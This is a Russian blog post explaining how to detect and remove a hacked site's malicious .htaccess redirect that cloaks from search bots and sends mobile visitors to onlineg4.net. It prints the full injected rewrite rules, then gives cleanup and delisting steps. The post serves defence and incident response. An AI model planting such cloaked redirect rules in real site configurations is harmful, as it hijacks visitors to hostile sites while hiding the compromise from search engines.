Как продает товары интернет-магазин Ламода
29 марта 2015
Ваш сайт взломали! Как найти и устранить беду
Исследования
0
1595
29 марта 2015
Итак, что мы имеем?
В поиске Яндекса этому сайту стала приписываться вот такая надпись:
Сайт может угрожать безопасности вашего компьютера или мобильного устройства
При переходе на сайт ничего страшного не происходит. Это потому что вирус или скорее дор ориентирован на мобильные устройства и планшеты. И если зайти на сайт с какого нибудь смартфона, то вас перекинут на какой-то левый сайт, в данном случае, это сайт onlineg4.net.
Вот такой код залили злоумышленники в файлик .htaccess на хостинге:
RewriteCond %{HTTP_USER_AGENT} (android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(accoona | ia_archiver | antabot | ask\ jeeves | baidu | dcpbot | eltaindexer | feedfetcher | gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo!\ slurp | mmcrawler | yandexbot | yandeximages | yandexvideo | yandexmedia | yandexblogs | yandexaddurl |
yandexfavicons | yandexdirect | yandexmetrika | yandexcatalog | yandexnews | yandeximageresizer) [NC]
RewriteRule (.*) http://onlineg4.net/u/9024 [L,R=302]
Тут не сложно было догадаться и найти его, как правило такой вредоносный редирект ставят в начале файла. Его можно с легкостью удалить и писать в Яндекс о том, что теперь с сайтом все в порядке и его стоит исключить из черного списка.
Более того, хочу сказать, что если у вас или ваших посетителей будет установлен антивирус Касперского, то ваш сайт еще поместят в черный список баз Касперского. После очистки сайта стоит еще писать в тех.поддержку Касперского с просьбой удалить сайт из их черного списка, а то пользователи никогда не попадут на ваш сайт.
Вот такой вот случай произошел, скажу он не редкость и, как правило, его легко устранить. Достаточно элементарных знаний кода:
- просматриваем файлик .htaccess, который лежит в корне вашего сайта;
- ищем в нем, как правило в начале, домен какого-то левого сайта, к которому вы не имеете отношения;
- ищем слова похожие на android | midp | j2me | symbian | series\ 60 | symbos | windows\ mobile | windows\ ce | ppc | smartphone | blackberry | mtk | bada | windows\ phone, то есть это с каких операционных систем люди будут перенаправляться на левый сайт;
- ищем название ботов gamespy | gigabot | googlebot | gsa-crawler | grub-client | gulper | slurp | mihalism | msnbot | worldindexer | ooyyo | pagebull | scooter | w3c_validator | jigsaw | webalta | yahoofeedseeker | yahoo;
- и самое последнее, ищем 302 редирект, потому что ставят именно его, не знаю с чем это связано, может они верят, что 302 редирект — это временный редирект.
Вот так можно выявить взлом сайта. Удачи и защищайте свои сайты от коварных злоумышленников.
Мнение автора является его собственностью и не претендует на истину в последней инстанции.
Отзыв о Телеком медиа по разработке сайта
29 марта 2015
Отзывы о PayPerProfits. Часть 2
29 марта 2015
Что делать если вас все-таки кинул фрилансер
29 марта 2015
Мой отзыв о BuzzBundle
29 марта 2015
Как запалить сетку сайтов
29 марта 2015
Влияние телевизора на сон
29 марта 2015
Отзывы об ООО ОТКЛИК АДВ
29 марта 2015
Можно ли выйграть в он-лайн рулетку. Часть 2
29 марта 2015
Ссылочная оптимизация сайта в 2021 году
29 марта 2015